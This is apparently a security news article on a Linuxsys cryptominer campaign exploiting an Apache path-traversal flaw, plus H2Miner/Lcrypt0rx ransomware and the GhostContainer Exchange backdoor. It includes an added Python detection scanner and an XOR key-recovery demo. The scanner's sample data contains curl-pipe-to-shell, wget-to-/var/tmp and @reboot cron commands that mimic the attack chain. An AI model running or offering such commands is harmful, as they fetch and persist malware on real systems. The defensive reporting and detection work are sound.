Thursday, July 24, 2025

Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner


Cybersecurity researchers have discovered a new campaign that exploits a known security flaw impacting Apache HTTP Server to deliver a cryptocurrency miner called Linuxsys.

The vulnerability in question is CVE-2021-41773 (CVSS score: 7.5), a high-severity path traversal vulnerability in Apache HTTP Server version 2.4.49 that could result in remote code execution.

"The attacker leverages compromised legitimate websites to distribute malware, enabling stealthy delivery and evasion of detection," VulnCheck's Jacob Baines said in a report shared with The Hacker News.

The infection sequence, observed earlier this month and originating from an Indonesian IP address 103.193.177[.]152, is designed to drop a next-stage payload from "repositorylinux[.]org" using curl or wget.

The payload is a shell script that is responsible for downloading the Linuxsys cryptocurrency miner from five different legitimate websites, suggesting that the threat actors behind the campaign have managed to compromise third-party infrastructure to facilitate the distribution of the malware.

"This approach is clever because victims connect to legitimate hosts with valid SSL certificates, making detection less likely," VulnCheck noted. "Additionally, it provides a layer of separation for the downloader site ('repositorylinux[.]org') since the malware itself isn't hosted there."

The sites also host another shell script named "cron.sh" that ensures that the miner is launched automatically upon a system reboot. The cybersecurity company said it also identified two Windows executables on the hacked sites, raising the possibility that the attackers are also going after Microsoft's desktop operating system.

It's worth noting that attacks distributing the Linuxsys miner have previously exploited a critical security flaw in OSGeo GeoServer GeoTools (CVE-2024-36401, CVSS score: 9.8), as documented by Fortinet FortiGuard Labs in September 2024.

Interestingly, the shell script dropped following the exploitation of that flaw was downloaded from "repositorylinux[.]com," with comments in the source code written in Sundanese, an Indonesian language. The same shell script has been detected in the wild as far back as December 2021.

Some of the other vulnerabilities exploited to deliver the miner in recent years include –

  • CVE-2023-22527, a template injection vulnerability in Atlassian Confluence Data Center and Confluence Server
  • CVE-2023-34960, a command injection vulnerability in Chamilo Learning Management System (LMS)
  • CVE-2023-38646, a command injection vulnerability in Metabase
  • CVE-2024-0012 and CVE-2024-9474, authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls
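As an added example (not code from VulnCheck's report or from the article), here is a small Python scanner that applies the chain described above to shell-history or crontab lines: a curl/wget fetch from the named downloader domain, a download piped straight into a shell, and a cron job launching a script from a scratch directory. The sample lines and the scratch-directory list are constructed assumptions, not observed artifacts.

```python
import re
from typing import Dict, List

# Downloader domains named in the report (defanged in the article text).
STAGER_DOMAINS = {"repositorylinux.org", "repositorylinux.com"}
# Assumption: world-writable scratch locations where staged scripts such as cron.sh tend to land.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?https?://([A-Za-z0-9.-]+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da)?sh\b")
# A crontab schedule: either @reboot or five numeric/wildcard fields.
CRON_SCHEDULE_RE = re.compile(r"^\s*(?:@reboot\b|(?:[\d*,/-]+\s+){5})")

def scan_line(line: str) -> List[str]:
    """Return the reasons one shell-history or crontab line matches the staging chain."""
    reasons: List[str] = []
    fetch = FETCH_RE.search(line)
    if fetch:
        host = fetch.group(1).lower()
        if host in STAGER_DOMAINS:
            reasons.append(f"fetch from known stager domain {host}")
        if PIPE_TO_SHELL_RE.search(line):
            reasons.append("download piped straight into a shell")
        if any(d in line for d in SCRATCH_DIRS):
            reasons.append("download written to a scratch directory")
    if CRON_SCHEDULE_RE.match(line) and any(d in line for d in SCRATCH_DIRS):
        reasons.append("cron job running a script from a scratch directory")
    return reasons

def scan_log(text: str) -> Dict[int, List[str]]:
    """Map 1-based line numbers to reasons, keeping only lines that were flagged."""
    hits: Dict[int, List[str]] = {}
    for num, line in enumerate(text.splitlines(), start=1):
        reasons = scan_line(line)
        if reasons:
            hits[num] = reasons
    return hits

# Constructed sample: lines 1-3 mimic the chain described in the report, lines 4-5 are benign.
SAMPLE_LINES = """\
curl -fsSL https://repositorylinux.org/linux.sh | sh
wget -q http://compromised-site.test/cron.sh -O /var/tmp/cron.sh
@reboot /bin/sh /var/tmp/cron.sh
0 3 * * * /usr/bin/apt-get update -q
curl -s https://updates.example.test/version.txt
"""

if __name__ == "__main__":
    for num, reasons in scan_log(SAMPLE_LINES).items():
        print(f"line {num}: " + "; ".join(reasons))
```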

"All of this suggests that the attacker has been conducting a long-term campaign, employing consistent techniques such as n-day exploitation, staging content on compromised hosts, and coin mining on victim machines," VulnCheck said.

"Part of their success comes from careful targeting. They appear to avoid low-interaction honeypots and require high interaction to observe their activity. Combined with the use of compromised hosts for malware distribution, this approach has largely helped the attacker avoid scrutiny."

The discovery of the Linuxsys miner attacks coincides with a new campaign associated with the H2Miner cryptocurrency mining botnet that delivers Kinsing, a remote access trojan (RAT) commonly used to deliver mining malware by targeting a wide variety of Linux-based infrastructure systems.

What makes the attack chain stand out is that it also delivers a Visual Basic Script-based variant of Lcryx ransomware, called Lcrypt0rx, marking the first documented instance of operational overlap between the two malware families.

"Lcryx is a relatively new VBScript-based ransomware strain first observed in November 2024," security researcher Akshat Pradhan said. "This family exhibits several unusual characteristics that suggest it may have been generated using artificial intelligence."

The attacks involve the use of a shell script that terminates processes related to security tools, databases, and other user applications before dropping Kinsing, which then delivers the XMRig miner. It's also designed to kill competing miner processes that may already be running on compromised hosts.

The Lcrypt0rx artifact, for its part, makes Windows Registry modifications to disable the execution of critical tools like System Configuration Utility, Group Policy Editor, Process Explorer, and System Settings Utility. It also turns off security software from Microsoft, Bitdefender, and Kaspersky, and attempts to overwrite the Master Boot Record (MBR) in a destructive move that's intended to render the system unbootable.


In an interesting twist, Lcrypt0rx downloads additional payloads onto the compromised machine prior to encryption, including the same XMRig payload dropped by H2Miner, Cobalt Strike, ConnectWise ScreenConnect, information stealers like Lumma and RustyStealer, and an injector that serves DCRat.

Once the files are encrypted, a ransom note is dropped in multiple locations, urging victims to pay $1,000 in cryptocurrency within three days, or risk getting their data leaked.

"Despite these actions, the ransomware does not transmit or store the encryption keys locally or remotely," Pradhan said. "Combined with the use of simple XOR encryption, this makes recovery trivial through basic cryptanalysis. The lack of key management, combined with the presence of scare tactics and superficial ransom demands, suggests that Lcrypt0rx operates more as scareware than a serious ransomware threat."

This behavior, Fortinet FortiGuard Labs theorized, is either a collaboration to maximize financial gain, or the work of the H2Miner operators themselves, or a way for them to use it as a distraction from spotting the mining activity.

The campaign signals the continued commodification of cybercrime, as access to pre-built tools and AI-generated code can further lower the barrier to entry, enabling even threat actors with little-to-no technical expertise to launch high-impact attacks at scale.

"Both the H2Miner and Lcrypt0rx chains converge on the deployment of Monero miners, a hallmark of resource hijacking campaigns," Fortinet said. "In cloud environments, this results in significant financial impact, as compromised systems incur increased compute costs, degraded performance, and elevated operational risk."
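To show why the missing key management matters for recovery, here is an added example (not Fortinet's code, and not derived from the Lcrypt0rx sample) of the basic cryptanalysis the researcher alludes to: recovering a repeating XOR key from the fixed bytes every PNG file carries at its start and end, then verifying the candidate before decrypting. The key and file contents are constructed for the demonstration; the one assumption is that the known header is at least as long as the key.

```python
from typing import Iterator, Optional

# Fixed bytes every PNG starts with (signature + IHDR chunk header) and ends with (IEND chunk).
PNG_PREFIX = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
PNG_SUFFIX = b"\x00\x00\x00\x00IEND\xaeB`\x82"

def xor_bytes(data: bytes, key: bytes, offset: int = 0) -> bytes:
    """Repeating-key XOR; offset is the position of data[0] within the whole file."""
    return bytes(b ^ key[(offset + i) % len(key)] for i, b in enumerate(data))

def candidate_keys(ciphertext: bytes, known_prefix: bytes, max_len: int = 32) -> Iterator[bytes]:
    """Yield every key period consistent with the keystream exposed by the known header."""
    # ciphertext XOR known plaintext reveals the keystream for those positions
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_prefix))
    for klen in range(1, min(max_len, len(stream)) + 1):
        key = stream[:klen]
        if all(stream[i] == key[i % klen] for i in range(len(stream))):
            yield key

def recover_key(ciphertext: bytes, known_prefix: bytes, known_suffix: bytes) -> Optional[bytes]:
    """Return the candidate that also decrypts the known trailer, or None if nothing fits."""
    start = len(ciphertext) - len(known_suffix)
    for key in candidate_keys(ciphertext, known_prefix):
        # the trailer's keystream offset depends on the file length, hence offset=start
        if xor_bytes(ciphertext[start:], key, offset=start) == known_suffix:
            return key
    return None

# Constructed sample: a minimal PNG-shaped plaintext encrypted with a 9-byte repeating key.
DEMO_KEY = b"demo-key!"
PLAINTEXT = PNG_PREFIX + bytes(range(40)) + PNG_SUFFIX
CIPHERTEXT = xor_bytes(PLAINTEXT, DEMO_KEY)

if __name__ == "__main__":
    key = recover_key(CIPHERTEXT, PNG_PREFIX, PNG_SUFFIX)
    print("recovered key:", key)
    print("decrypted correctly:", key is not None and xor_bytes(CIPHERTEXT, key) == PLAINTEXT)
```

The same header-and-trailer approach works for any format with fixed magic bytes (PDF, ZIP, Office files); without the trailer check a header shorter than the key would silently accept a wrong period.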


Exchange Servers Targeted by GhostContainer Backdoor

The development comes as Kaspersky disclosed details of a campaign that's targeting government entities in Asia, likely with an N-day security flaw in Microsoft Exchange Server, to deploy a bespoke backdoor dubbed GhostContainer. It's suspected that the attacks may have exploited a now-patched remote code execution bug in Exchange Server (CVE-2020-0688, CVSS score: 8.8).

The "sophisticated, multi-functional backdoor" can be "dynamically extended with arbitrary functionality through the download of additional modules," the Russian company said, adding that "the backdoor grants the attackers full control over the Exchange server, allowing them to execute a range of malicious actions."

The malware is equipped to parse instructions that can execute shellcode, download files, read or delete files, run arbitrary commands, and load additional .NET byte code. It also incorporates a web proxy and tunneling module.

It's suspected that the activity may have been part of an advanced persistent threat (APT) campaign aimed at high-value organizations, including high-tech companies, in Asia.

Not much is known about who's behind the attacks, although they're assessed to be highly skilled owing to their in-depth understanding of Microsoft Exchange Server and their ability to transform publicly available code into advanced espionage tools.

"The GhostContainer backdoor does not establish a connection to any [command-and-control] infrastructure," Kaspersky said. "Instead, the attacker connects to the compromised server from the outside, and their control commands are hidden inside normal Exchange web requests."
